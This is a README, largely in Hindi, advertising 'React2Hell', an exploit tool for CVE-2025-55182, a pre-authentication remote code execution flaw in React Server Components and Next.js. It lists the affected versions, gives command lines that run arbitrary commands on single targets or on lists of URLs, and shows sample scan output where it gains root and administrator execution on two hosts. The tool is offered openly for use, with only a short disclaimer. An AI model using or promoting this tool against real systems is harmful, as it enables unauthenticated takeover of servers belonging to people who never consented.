
[React2Hell] Next.js/React Server RCE Exploit — CVE-2025-55182
🔥 Next.js / React Server रिमोट कोड निष्पादन (RCE) शोषण
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Chetanya Sharma (AggressiveUser)
════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
React2Hell एक शक्तिशाली शोषण उपकरण है जिसे CVE-2025-55182 का परीक्षण और शोषण करने के लिए डिज़ाइन किया गया है, जो Next.js और React Server Actions को प्रभावित करने वाली एक गंभीर रिमोट कोड निष्पादन भेद्यता है।
React Server Components संस्करण 19.0.0, 19.1.0, 19.1.1 और 19.2.0 में एक प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन भेद्यता मौजूद है, जिसमें निम्नलिखित पैकेज शामिल हैं: react-server-dom-parcel, react-server-dom-turbopack, और react-server-dom-webpack। भेद्य कोड सर्वर फ़ंक्शन एंडपॉइंट पर HTTP अनुरोधों से पेलोड को असुरक्षित रूप से डिसीरियलाइज़ करता है।
python exploit.py -u https://target.com -c "whoami"
python exploit.py -l urls.txt -c "whoami"
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
http://site1.com
https://site2.com
http://192.168.1.10:3000
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami
█████▄ ▄▄▄▄▄ ▄▄▄ ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ██ ██ ▄▄▄▄▄ ▄▄ ▄▄
██▄▄██▄ ██▄▄ ██▀██ ██▀▀▀ ██ ▄██▀ ██████ ██▄▄ ██ ██
██ ██ ██▄▄▄ ██▀██ ▀████ ██ ███▄▄ ██ ██ ██▄▄▄ ██▄▄▄ ██▄▄▄
Next.js/React Server RCE Exploit — CVE-2025-55182
Author: Chetanya Sharma (AggressiveUser)
════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════
[→] Target: http://meow.host:3113/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[→] Target: http://evil.lab:2000/
[→] Exec: whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────
[→] Target: https://vul.lab:3000/
[→] Exec: whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>
यह उपकरण केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए बनाया गया है। इसे स्पष्ट प्राधिकरण के बिना सिस्टम पर उपयोग न करें। आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।
यदि इस शोषण ने आपकी मदद की, तो GitHub पर ⭐ छोड़ने पर विचार करें ❤️
Chetanya Sharma (AggressiveUser)
🔥 से बनाया गया उन व्यक्ति द्वारा जो चीजों को तोड़ना और ठीक करना पसंद करता है।